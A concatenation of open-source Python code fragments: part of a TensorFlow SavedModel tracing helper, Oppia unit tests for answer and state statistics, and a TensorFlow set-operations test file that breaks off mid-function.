flat_outputs, _ = tf2_utils.strip_and_get_tensors_and_control_dependencies(
tf.nest.flatten(fetches, expand_composites=True))
fetches = tf.nest.pack_sequence_as(
concrete_function.structured_outputs,
flat_outputs,
expand_composites=True)
result = wrapped_fn.prune(
feeds=concrete_function.inputs,
fetches=fetches,
input_signature=concrete_function.structured_input_signature)
# TODO(b/163329414): Remove once `prune` retains shape information for all
# components.
for original_out, pruned_out in zip(concrete_function.outputs,
result.outputs):
pruned_out.set_shape(original_out.get_shape())
return result
def trace_and_update_module(
module: tf.Module, tf_function: function.Function, name: str,
strip_control_dependencies: bool) -> function.ConcreteFunction:
"""Traces `tf_function` and saves under attr `name` of `module`.
Args:
module: A saveable module which will contain the traced `tf_function` under
attr `name`.
tf_function: A tf.function to trace.
name: A name to same the traced `tf_function` to.
strip_control_dependencies: Boolean. If True, automatic control dependencies
will be stripped from the outputs of `tf_function`. This should almost
always be False. It is useful only if you want to use the structure of the
TF graph to perform any graph manipulations.
Returns:
The concrete function obtained from tracing `tf_function`.
"""
resource_tracker = tracking.ResourceTracker()
object_tracker = annotators.ObjectTracker()
created_variables = []
def _variable_creator(next_creator, **kwargs):
var = next_creator(**kwargs)
created_variables.append(var)
return var
# Trace `tf_function` to gather any resources in it using the
# resource_tracker. These are then assigned to `module.resources` and tracked
# before exporting to SavedModel.
with tracking.resource_tracker_scope(resource_tracker), \
annotators.object_tracker_scope(object_tracker), \
tf.variable_creator_scope(_variable_creator):
concrete_fn = tf_function.get_concrete_function()
# Prior to 2020/10/08, saving a tf.function with a concrete function signature
# would ensure that the function was not re-traced in a round-trip to a
# SavedModel. Since this is no longer the case, we save the concrete function
# directly.
if tf.compat.forward_compatible(2020, 10, 8):
pruned_function = optimize_concrete_function(concrete_fn,
strip_control_dependencies)
module.pruned_variables = pruned_function.variables
setattr(module, name, pruned_function)
else:
setattr(module, name, tf_function)
# Any variables created need to be explicitly tracked.
module.created_variables = created_variables
# Resources need to be explicitly tracked.
module.resources = resource_tracker.resources
module.trackable_objects = object_tracker.trackable_objects
# TODO(b/158011374) - Stop explicitly tracking initializers. Tracking the
# table should be sufficient.
initializers = []
for resource in module.resources:
if isinstance(resource, lookup_ops.InitializableLookupTableBase):
initializers.append(resource._initializer) # pylint: disable=protected-access
module.initializers = initializers
module.assets = [
common_types.Asset(asset_filepath) for asset_filepath in
concrete_fn.graph.get_collection(tf.compat.v1.GraphKeys.ASSET_FILEPATHS)
]
return concrete_fn
def write_v2_saved_model(module: tf.Module, tf_function: function.Function,
name: str,
saved_model_dir: str) -> function.ConcreteFunction:
"""Writes `tf_function` under attr `name` of `module` to `saved_model_dir`."""
concrete_fn = trace_and_update_module(
module, tf_function, name, strip_control_dependencies=False)
tf.saved_model.save(module, saved_model_dir)
return concrete_fn
| |
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'Jeremy Emerson'
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import rule_domain
from core.domain import stats_domain
from core.domain import stats_services
import test_utils
class EventHandlerUnitTests(test_utils.GenericTestBase):
"""Test the event handler methods."""
DEFAULT_RULESPEC_STR = exp_domain.DEFAULT_RULESPEC_STR
SUBMIT_HANDLER = stats_services.SUBMIT_HANDLER_NAME
def test_record_state_hit(self):
stats_services.EventHandler.record_state_hit('eid', 'sname', True)
counter = stats_domain.StateCounter.get('eid', 'sname')
self.assertEquals(counter.first_entry_count, 1)
self.assertEquals(counter.subsequent_entries_count, 0)
self.assertEquals(counter.resolved_answer_count, 0)
self.assertEquals(counter.active_answer_count, 0)
self.assertEquals(counter.total_entry_count, 1)
self.assertEquals(counter.no_answer_count, 1)
answer_log = stats_domain.StateRuleAnswerLog.get(
'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR)
self.assertEquals(answer_log.answers, {})
stats_services.EventHandler.record_state_hit('eid', 'sname', False)
counter = stats_domain.StateCounter.get('eid', 'sname')
self.assertEquals(counter.first_entry_count, 1)
self.assertEquals(counter.subsequent_entries_count, 1)
self.assertEquals(counter.resolved_answer_count, 0)
self.assertEquals(counter.active_answer_count, 0)
self.assertEquals(counter.total_entry_count, 2)
self.assertEquals(counter.no_answer_count, 2)
answer_log = stats_domain.StateRuleAnswerLog.get(
'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR)
self.assertEquals(answer_log.answers, {})
def test_record_answer_submitted(self):
stats_services.EventHandler.record_state_hit('eid', 'sname', True)
stats_services.EventHandler.record_answer_submitted(
'eid', 'sname', self.SUBMIT_HANDLER, 'Rule', 'answer')
counter = stats_domain.StateCounter.get('eid', 'sname')
self.assertEquals(counter.first_entry_count, 1)
self.assertEquals(counter.subsequent_entries_count, 0)
self.assertEquals(counter.total_entry_count, 1)
self.assertEquals(counter.resolved_answer_count, 0)
self.assertEquals(counter.active_answer_count, 1)
self.assertEquals(counter.no_answer_count, 0)
answer_log = stats_domain.StateRuleAnswerLog.get(
'eid', 'sname', self.SUBMIT_HANDLER, 'Rule')
self.assertEquals(answer_log.answers, {'answer': 1})
stats_services.EventHandler.record_state_hit('eid', 'sname', False)
stats_services.EventHandler.record_answer_submitted(
'eid', 'sname', self.SUBMIT_HANDLER, 'Rule', 'answer')
counter = stats_domain.StateCounter.get('eid', 'sname')
self.assertEquals(counter.first_entry_count, 1)
self.assertEquals(counter.subsequent_entries_count, 1)
self.assertEquals(counter.total_entry_count, 2)
self.assertEquals(counter.resolved_answer_count, 0)
self.assertEquals(counter.active_answer_count, 2)
self.assertEquals(counter.no_answer_count, 0)
answer_log = stats_domain.StateRuleAnswerLog.get(
'eid', 'sname', self.SUBMIT_HANDLER, 'Rule')
self.assertEquals(answer_log.answers, {'answer': 2})
stats_services.EventHandler.record_state_hit('eid', 'sname', False)
counter = stats_domain.StateCounter.get('eid', 'sname')
self.assertEquals(counter.first_entry_count, 1)
self.assertEquals(counter.subsequent_entries_count, 2)
self.assertEquals(counter.total_entry_count, 3)
self.assertEquals(counter.resolved_answer_count, 0)
self.assertEquals(counter.active_answer_count, 2)
self.assertEquals(counter.no_answer_count, 1)
answer_log = stats_domain.StateRuleAnswerLog.get(
'eid', 'sname', self.SUBMIT_HANDLER, 'Rule')
self.assertEquals(answer_log.answers, {'answer': 2})
def test_resolve_answers_for_default_rule(self):
stats_services.EventHandler.record_state_hit('eid', 'sname', True)
# Submit three answers.
stats_services.EventHandler.record_answer_submitted(
'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR,
'a1')
stats_services.EventHandler.record_answer_submitted(
'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR,
'a2')
stats_services.EventHandler.record_answer_submitted(
'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR,
'a3')
counter = stats_domain.StateCounter.get('eid', 'sname')
self.assertEquals(counter.resolved_answer_count, 0)
self.assertEquals(counter.active_answer_count, 3)
answer_log = stats_domain.StateRuleAnswerLog.get(
'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR)
self.assertEquals(
answer_log.answers, {'a1': 1, 'a2': 1, 'a3': 1})
# Nothing changes if you try to resolve an invalid answer.
stats_services.EventHandler.resolve_answers_for_default_rule(
'eid', 'sname', self.SUBMIT_HANDLER, ['fake_answer'])
answer_log = stats_domain.StateRuleAnswerLog.get(
'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR)
self.assertEquals(
answer_log.answers, {'a1': 1, 'a2': 1, 'a3': 1})
# Resolve two answers.
stats_services.EventHandler.resolve_answers_for_default_rule(
'eid', 'sname', self.SUBMIT_HANDLER, ['a1', 'a2'])
counter = stats_domain.StateCounter.get('eid', 'sname')
self.assertEquals(counter.resolved_answer_count, 2)
self.assertEquals(counter.active_answer_count, 1)
answer_log = stats_domain.StateRuleAnswerLog.get(
'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR)
self.assertEquals(answer_log.answers, {'a3': 1})
# Nothing changes if you try to resolve an answer that has already
# been resolved.
stats_services.EventHandler.resolve_answers_for_default_rule(
'eid', 'sname', self.SUBMIT_HANDLER, ['a1'])
answer_log = stats_domain.StateRuleAnswerLog.get(
'eid', 'sname', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR)
self.assertEquals(answer_log.answers, {'a3': 1})
# Resolve the last answer.
stats_services.EventHandler.resolve_answers_for_default_rule(
'eid', 'sname', self.SUBMIT_HANDLER, ['a3'])
counter = stats_domain.StateCounter.get('eid', 'sname')
self.assertEquals(counter.resolved_answer_count, 3)
self.assertEquals(counter.active_answer_count, 0)
answer_log = stats_domain.StateRuleAnswerLog.get(
'eid', 'sname', self.SUBMIT_HANDLER, 'Rule')
self.assertEquals(answer_log.answers, {})
class StatsServicesUnitTests(test_utils.GenericTestBase):
"""Test the statistics services."""
DEFAULT_RULESPEC_STR = exp_domain.DEFAULT_RULESPEC_STR
SUBMIT_HANDLER = stats_services.SUBMIT_HANDLER_NAME
class TopImprovableStatesUnitTests(test_utils.GenericTestBase):
"""Test the get_top_improvable_states() function."""
DEFAULT_RULESPEC_STR = exp_domain.DEFAULT_RULESPEC_STR
SUBMIT_HANDLER = stats_services.SUBMIT_HANDLER_NAME
def test_get_top_improvable_states(self):
exp = exp_domain.Exploration.create_default_exploration(
'eid', 'A title', 'A category')
exp_services.save_new_exploration('fake@user.com', exp)
state_name = exp.init_state_name
for _ in range(5):
stats_services.EventHandler.record_state_hit(
'eid', state_name, True)
stats_services.EventHandler.record_answer_submitted(
'eid', state_name, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '1')
for _ in range(2):
stats_services.EventHandler.record_answer_submitted(
'eid', state_name, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '2')
expected_top_state = {
'exp_id': 'eid', 'type': 'default', 'rank': 3,
'state_name': exp.init_state_name
}
states = stats_services.get_top_improvable_states(['eid'], 10)
self.assertEquals(len(states), 1)
self.assertDictContainsSubset(expected_top_state, states[0])
def test_single_default_rule_hit(self):
exp = exp_domain.Exploration.create_default_exploration(
'eid', 'A title', 'A category')
exp_services.save_new_exploration('fake@user.com', exp)
state_name = exp.init_state_name
stats_services.EventHandler.record_state_hit('eid', state_name, True)
stats_services.EventHandler.record_answer_submitted(
'eid', state_name, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '1')
expected_top_state = {
'exp_id': 'eid', 'type': 'default', 'rank': 1,
'state_name': exp.init_state_name
}
states = stats_services.get_top_improvable_states(['eid'], 2)
self.assertEquals(len(states), 1)
self.assertDictContainsSubset(expected_top_state, states[0])
def test_no_improvement_flag_hit(self):
exp = exp_domain.Exploration.create_default_exploration(
'eid', 'A title', 'A category')
exp_services.save_new_exploration('fake@user.com', exp)
not_default_rule_spec = exp_domain.RuleSpec({
'rule_type': rule_domain.ATOMIC_RULE_TYPE,
'name': 'NotDefault',
'inputs': {},
'subject': 'answer'
}, exp.init_state_name, [], [])
exp.init_state.widget.handlers[0].rule_specs = [
not_default_rule_spec, exp_domain.DEFAULT_RULESPEC
]
exp_services._save_exploration('fake@user.com', exp, '', [])
stats_services.EventHandler.record_state_hit(
'eid', exp.init_state_name, True)
stats_services.EventHandler.record_answer_submitted(
'eid', exp.init_state_name, self.SUBMIT_HANDLER,
str(not_default_rule_spec), '1')
states = stats_services.get_top_improvable_states(['eid'], 1)
self.assertEquals(len(states), 0)
def test_incomplete_and_default_flags(self):
exp = exp_domain.Exploration.create_default_exploration(
'eid', 'A title', 'A category')
exp_services.save_new_exploration('fake@user.com', exp)
state_name = exp.init_state_name
# Hit the default rule once, and fail to answer twice. The result
# should be classified as incomplete.
for _ in range(3):
stats_services.EventHandler.record_state_hit(
'eid', state_name, True)
stats_services.EventHandler.record_answer_submitted(
'eid', state_name, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '1')
states = stats_services.get_top_improvable_states(['eid'], 2)
self.assertEquals(len(states), 1)
self.assertEquals(states[0]['rank'], 2)
self.assertEquals(states[0]['type'], 'incomplete')
# Now hit the default two more times. The result should be classified
# as default.
for i in range(2):
stats_services.EventHandler.record_state_hit(
'eid', state_name, True)
stats_services.EventHandler.record_answer_submitted(
'eid', state_name, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '1')
states = stats_services.get_top_improvable_states(['eid'], 2)
self.assertEquals(len(states), 1)
self.assertEquals(states[0]['rank'], 3)
self.assertEquals(states[0]['type'], 'default')
def test_two_state_default_hit(self):
exp = exp_domain.Exploration.create_default_exploration(
'eid', 'A title', 'A category')
exp_services.save_new_exploration('fake@user.com', exp)
FIRST_STATE_NAME = exp.init_state_name
SECOND_STATE_NAME = 'State 2'
exp.add_states([SECOND_STATE_NAME])
exp_services._save_exploration('fake@user.com', exp, '', [])
# Hit the default rule of state 1 once, and the default rule of state 2
# twice.
stats_services.EventHandler.record_state_hit(
'eid', FIRST_STATE_NAME, True)
stats_services.EventHandler.record_answer_submitted(
'eid', FIRST_STATE_NAME, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '1')
for i in range(2):
stats_services.EventHandler.record_state_hit(
'eid', SECOND_STATE_NAME, True)
stats_services.EventHandler.record_answer_submitted(
'eid', SECOND_STATE_NAME, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '1')
states = stats_services.get_top_improvable_states(['eid'], 5)
self.assertEquals(len(states), 2)
self.assertDictContainsSubset({
'rank': 2,
'type': 'default',
'state_name': SECOND_STATE_NAME
}, states[0])
self.assertDictContainsSubset({
'rank': 1,
'type': 'default',
'state_name': FIRST_STATE_NAME
}, states[1])
# Hit the default rule of state 1 two more times.
for i in range(2):
stats_services.EventHandler.record_state_hit(
'eid', FIRST_STATE_NAME, True)
stats_services.EventHandler.record_answer_submitted(
'eid', FIRST_STATE_NAME, self.SUBMIT_HANDLER,
self.DEFAULT_RULESPEC_STR, '1')
states = stats_services.get_top_improvable_states(['eid'], 5)
self.assertEquals(len(states), 2)
self.assertDictContainsSubset({
'rank': 3,
'type': 'default',
'state_name': FIRST_STATE_NAME
}, states[0])
self.assertDictContainsSubset({
'rank': 2,
'type': 'default',
'state_name': SECOND_STATE_NAME
}, states[1])
# Try getting just the top improvable state.
states = stats_services.get_top_improvable_states(['eid'], 1)
self.assertEquals(len(states), 1)
self.assertDictContainsSubset({
'rank': 3,
'type': 'default',
'state_name': FIRST_STATE_NAME
}, states[0])
class UnresolvedAnswersTests(test_utils.GenericTestBase):
"""Test the unresolved answers methods."""
DEFAULT_RULESPEC_STR = exp_domain.DEFAULT_RULESPEC_STR
SUBMIT_HANDLER = stats_services.SUBMIT_HANDLER_NAME
def test_get_unresolved_answers(self):
self.assertEquals(
stats_services.get_unresolved_answers_for_default_rule(
'eid', 'sid'), {})
stats_services.EventHandler.record_answer_submitted(
'eid', 'sid', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR, 'a1')
self.assertEquals(
stats_services.get_unresolved_answers_for_default_rule(
'eid', 'sid'), {'a1': 1})
stats_services.EventHandler.record_answer_submitted(
'eid', 'sid', self.SUBMIT_HANDLER, self.DEFAULT_RULESPEC_STR, 'a1')
self.assertEquals(
stats_services.get_unresolved_answers_for_default_rule(
'eid', 'sid'), {'a1': 2})
stats_services.EventHandler.resolve_answers_for_default_rule(
'eid', 'sid', self.SUBMIT_HANDLER, ['a1'])
self.assertEquals(
stats_services.get_unresolved_answers_for_default_rule(
'eid', 'sid'), {})
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for set_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
_DTYPES = set([
tf.int8, tf.int16, tf.int32, tf.int64, tf.uint8, tf.uint16, tf.string])
def _values(values, dtype):
return np.array(
values,
dtype=(np.unicode if (dtype == tf.string) else dtype.as_numpy_dtype))
def _constant(values, dtype):
return tf.constant(_values(values, dtype), dtype=dtype)
def _dense_to_sparse(dense, dtype):
indices = []
values = []
max_row_len = 0
for row in dense:
max_row_len = max(max_row_len, len(row))
shape = [len(dense), max_row_len]
row_ix = 0
for row in dense:
col_ix = 0
for cell in row:
indices.append([row_ix, col_ix])
values.append(str(cell) if dtype == tf.string else cell)
col_ix += 1
row_ix += 1
return tf.SparseTensor(
tf.constant(indices, tf.int64),
tf.constant(values, dtype),
tf.constant(shape, tf.int64))
class SetOpsTest(test_util.TensorFlowTestCase):
def test_set_size_2d(self):
for dtype in _DTYPES:
self._test_set_size_2d(dtype)
def _test_set_size_2d(self, dtype):
self.assertAllEqual(
[1], self._set_size(_dense_to_sparse([[1]], dtype)))
self.assertAllEqual(
[2, 1], self._set_size(_dense_to_sparse([[1, 9], [1]], dtype)))
self.assertAllEqual(
[3, 0], self._set_size(_dense_to_sparse([[1, 9, 2], []], dtype)))
self.assertAllEqual(
[0, 3], self._set_size(_dense_to_sparse([[], [1, 9, 2]], dtype)))
def test_set_size_duplicates_2d(self):
for dtype in _DTYPES:
self._test_set_size_duplicates_2d(dtype)
def _test_set_size_duplicates_2d(self, dtype):
self.assertAllEqual(
[1], self._set_size(_dense_to_sparse([[1, 1, 1, 1, 1, 1]], dtype)))
self.assertAllEqual(
[2, 7, 3, 0, 1],
self._set_size(_dense_to_sparse([
[1, 9],
[6, 7, 8, 8, 6, 7, 5, 3, 3, 0, 6, 6, 9, 0, 0, 0],
[999, 1, -1000],
[],
[-1]
], dtype)))
def test_set_size_3d(self):
for dtype in _DTYPES:
self._test_set_size_3d(dtype)
def test_set_size_3d_invalid_indices(self):
for dtype in _DTYPES:
self._test_set_size_3d(dtype, invalid_indices=True)
def _test_set_size_3d(self, dtype, invalid_indices=False):
if invalid_indices:
indices = tf.constant([
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
[0, 0, 0], [0, 0, 2], # 0,0
# 2,0
[2, 1, 1] # 2,1
], tf.int64)
else:
indices = tf.constant([
[0, 0, 0], [0, 0, 2], # 0,0
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
# 2,0
[2, 1, 1] # 2,1
], tf.int64)
sp = tf.SparseTensor(
indices,
_constant([
1, 9, # 0,0
3, 3, # 0,1
1, # 1,0
9, 7, 8, # 1,1
# 2,0
5 # 2,1
], dtype),
tf.constant([3, 2, 3], tf.int64))
if invalid_indices:
with self.assertRaisesRegexp(tf.OpError, "out of order"):
self._set_size(sp)
else:
self.assertAllEqual([
[2, # 0,0
1], # 0,1
[1, # 1,0
3], # 1,1
[0, # 2,0
1] # 2,1
], self._set_size(sp))
def _set_size(self, sparse_data):
# Validate that we get the same results with or without `validate_indices`.
ops = [
tf.contrib.metrics.set_size(sparse_data, validate_indices=True),
tf.contrib.metrics.set_size(sparse_data, validate_indices=False)
]
with self.test_session() as sess:
results = sess.run(ops)
self.assertAllEqual(results[0], results[1])
return results[0]
def test_set_intersection_multirow_2d(self):
for dtype in _DTYPES:
self._test_set_intersection_multirow_2d(dtype)
def _test_set_intersection_multirow_2d(self, dtype):
a_values = [[9, 1, 5], [2, 4, 3]]
b_values = [[1, 9], [1]]
expected_indices = [[0, 0], [0, 1]]
expected_values = _values([1, 9], dtype)
expected_shape = [2, 2]
expected_counts = [2, 0]
# Dense to sparse.
a = _constant(a_values, dtype=dtype)
sp_b = _dense_to_sparse(b_values, dtype=dtype)
intersection = self._set_intersection(a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_intersection_count(a, sp_b))
# Sparse to sparse.
sp_a = _dense_to_sparse(a_values, dtype=dtype)
intersection = self._set_intersection(sp_a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_intersection_count(sp_a, sp_b))
def test_dense_set_intersection_multirow_2d(self):
for dtype in _DTYPES:
self._test_dense_set_intersection_multirow_2d(dtype)
def _test_dense_set_intersection_multirow_2d(self, dtype):
a_values = [[9, 1, 5], [2, 4, 3]]
b_values = [[1, 9], [1, 5]]
expected_indices = [[0, 0], [0, 1]]
expected_values = _values([1, 9], dtype)
expected_shape = [2, 2]
expected_counts = [2, 0]
# Dense to dense.
a = _constant(a_values, dtype)
b = _constant(b_values, dtype)
intersection = self._set_intersection(a, b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_intersection_count(a, b))
def test_set_intersection_duplicates_2d(self):
for dtype in _DTYPES:
self._test_set_intersection_duplicates_2d(dtype)
def _test_set_intersection_duplicates_2d(self, dtype):
a_values = [[1, 1, 3]]
b_values = [[1]]
expected_indices = [[0, 0]]
expected_values = _values([1], dtype)
expected_shape = [1, 1]
expected_counts = [1]
# Dense to dense.
a = _constant(a_values, dtype=dtype)
b = _constant(b_values, dtype=dtype)
intersection = self._set_intersection(a, b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_intersection_count(a, b))
# Dense to sparse.
sp_b = _dense_to_sparse(b_values, dtype=dtype)
intersection = self._set_intersection(a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_intersection_count(a, sp_b))
# Sparse to sparse.
sp_a = _dense_to_sparse(a_values, dtype=dtype)
intersection = self._set_intersection(sp_a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_intersection_count(sp_a, sp_b))
def test_set_intersection_3d(self):
for dtype in _DTYPES:
self._test_set_intersection_3d(dtype=dtype)
def test_set_intersection_3d_invalid_indices(self):
for dtype in _DTYPES:
self._test_set_intersection_3d(dtype=dtype, invalid_indices=True)
def _test_set_intersection_3d(self, dtype, invalid_indices=False):
if invalid_indices:
indices = tf.constant([
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
[0, 0, 0], [0, 0, 2], # 0,0
# 2,0
[2, 1, 1] # 2,1
# 3,*
], tf.int64)
else:
indices = tf.constant([
[0, 0, 0], [0, 0, 2], # 0,0
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
# 2,0
[2, 1, 1] # 2,1
# 3,*
], tf.int64)
sp_a = tf.SparseTensor(
indices,
_constant([
1, 9, # 0,0
3, 3, # 0,1
1, # 1,0
9, 7, 8, # 1,1
# 2,0
5 # 2,1
# 3,*
], dtype),
tf.constant([4, 2, 3], tf.int64))
sp_b = tf.SparseTensor(
tf.constant([
[0, 0, 0], [0, 0, 3], # 0,0
# 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], # 1,1
[2, 0, 1], # 2,0
[2, 1, 1], # 2,1
[3, 0, 0], # 3,0
[3, 1, 0] # 3,1
], tf.int64),
_constant([
1, 3, # 0,0
# 0,1
3, # 1,0
7, 8, # 1,1
2, # 2,0
5, # 2,1
4, # 3,0
4 # 3,1
], dtype),
tf.constant([4, 2, 4], tf.int64))
if invalid_indices:
with self.assertRaisesRegexp(tf.OpError, "out of order"):
self._set_intersection(sp_a, sp_b)
else:
expected_indices = [
[0, 0, 0], # 0,0
# 0,1
# 1,0
[1, 1, 0], [1, 1, 1], # 1,1
# 2,0
[2, 1, 0], # 2,1
# 3,*
]
expected_values = _values([
1, # 0,0
# 0,1
# 1,0
7, 8, # 1,1
# 2,0
5, # 2,1
# 3,*
], dtype)
expected_shape = [4, 2, 2]
expected_counts = [[
1, # 0,0
0 # 0,1
], [
0, # 1,0
2 # 1,1
], [
0, # 2,0
1 # 2,1
], [
0, # 3,0
0 # 3,1
]]
# Sparse to sparse.
intersection = self._set_intersection(sp_a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_intersection_count(sp_a, sp_b))
# NOTE: sparse_to_dense doesn't support uint8 and uint16.
if dtype not in [tf.uint8, tf.uint16]:
# Dense to sparse.
a = tf.cast(
tf.sparse_to_dense(
sp_a.indices,
sp_a.shape,
sp_a.values,
default_value="-1" if dtype == tf.string else -1),
dtype=dtype)
intersection = self._set_intersection(a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(
expected_counts, self._set_intersection_count(a, sp_b))
# Dense to dense.
b = tf.cast(
tf.sparse_to_dense(
sp_b.indices,
sp_b.shape,
sp_b.values,
default_value="-2" if dtype == tf.string else -2),
dtype=dtype)
intersection = self._set_intersection(a, b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_intersection_count(a, b))
def _set_intersection(self, a, b):
# Validate that we get the same results with or without `validate_indices`.
ops = [
tf.contrib.metrics.set_intersection(a, b, validate_indices=True),
tf.contrib.metrics.set_intersection(a, b, validate_indices=False)
]
with self.test_session() as sess:
results = sess.run(ops)
self.assertAllEqual(results[0].indices, results[1].indices)
self.assertAllEqual(results[0].values, results[1].values)
self.assertAllEqual(results[0].shape, results[1].shape)
return results[0]
def _set_intersection_count(self, a, b):
op = tf.contrib.metrics.set_size(tf.contrib.metrics.set_intersection(a, b))
with self.test_session() as sess:
return sess.run(op)
def test_set_difference_multirow_2d(self):
for dtype in _DTYPES:
self._test_set_difference_multirow_2d(dtype)
def _test_set_difference_multirow_2d(self, dtype):
a_values = [[1, 1, 1], [1, 5, 9], [4, 5, 3], [5, 5, 1]]
b_values = [[], [1, 2], [1, 2, 2], []]
# a - b.
expected_indices = [
[0, 0], [1, 0], [1, 1], [2, 0], [2, 1], [2, 2], [3, 0], [3, 1]
]
expected_values = _values([1, 5, 9, 3, 4, 5, 1, 5], dtype)
expected_shape = [4, 3]
expected_counts = [1, 2, 3, 2]
# Dense to sparse.
a = _constant(a_values, dtype=dtype)
sp_b = _dense_to_sparse(b_values, dtype=dtype)
difference = self._set_difference(a, sp_b, True)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(a, sp_b, True))
# Sparse to sparse.
sp_a = _dense_to_sparse(a_values, dtype=dtype)
difference = self._set_difference(sp_a, sp_b, True)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(sp_a, sp_b, True))
# b - a.
expected_indices = [[1, 0], [2, 0], [2, 1]]
expected_values = _values([2, 1, 2], dtype)
expected_shape = [4, 2]
expected_counts = [0, 1, 2, 0]
# Dense to sparse.
difference = self._set_difference(a, sp_b, False)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(a, sp_b, False))
# Sparse to sparse.
difference = self._set_difference(sp_a, sp_b, False)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(sp_a, sp_b, False))
def test_dense_set_difference_multirow_2d(self):
for dtype in _DTYPES:
self._test_dense_set_difference_multirow_2d(dtype)
def _test_dense_set_difference_multirow_2d(self, dtype):
a_values = [[1, 5, 9], [4, 5, 3]]
b_values = [[1, 2, 6], [1, 2, 2]]
# a - b.
expected_indices = [[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]]
expected_values = _values([5, 9, 3, 4, 5], dtype)
expected_shape = [2, 3]
expected_counts = [2, 3]
# Dense to dense.
a = _constant(a_values, dtype=dtype)
b = _constant(b_values, dtype=dtype)
difference = self._set_difference(a, b, True)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_difference_count(a, b, True))
# b - a.
expected_indices = [[0, 0], [0, 1], [1, 0], [1, 1]]
expected_values = _values([2, 6, 1, 2], dtype)
expected_shape = [2, 2]
expected_counts = [2, 2]
# Dense to dense.
difference = self._set_difference(a, b, False)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, difference, dtype=dtype)
self.assertAllEqual(expected_counts,
self._set_difference_count(a, b, False))
def test_sparse_set_difference_multirow_2d(self):
for dtype in _DTYPES:
self._test_sparse_set_difference_multirow_2d(dtype)
def _test_sparse_set_difference_multirow_2d(self, dtype):
sp_a = _dense_to_sparse(
[[], [1, 5, 9], [4, 5, 3, 3, 4, 5], [5, 1]], dtype=dtype)
sp_b = _dense_to_sparse([[], [1, 2], [1, 2, 2], []], dtype=dtype)
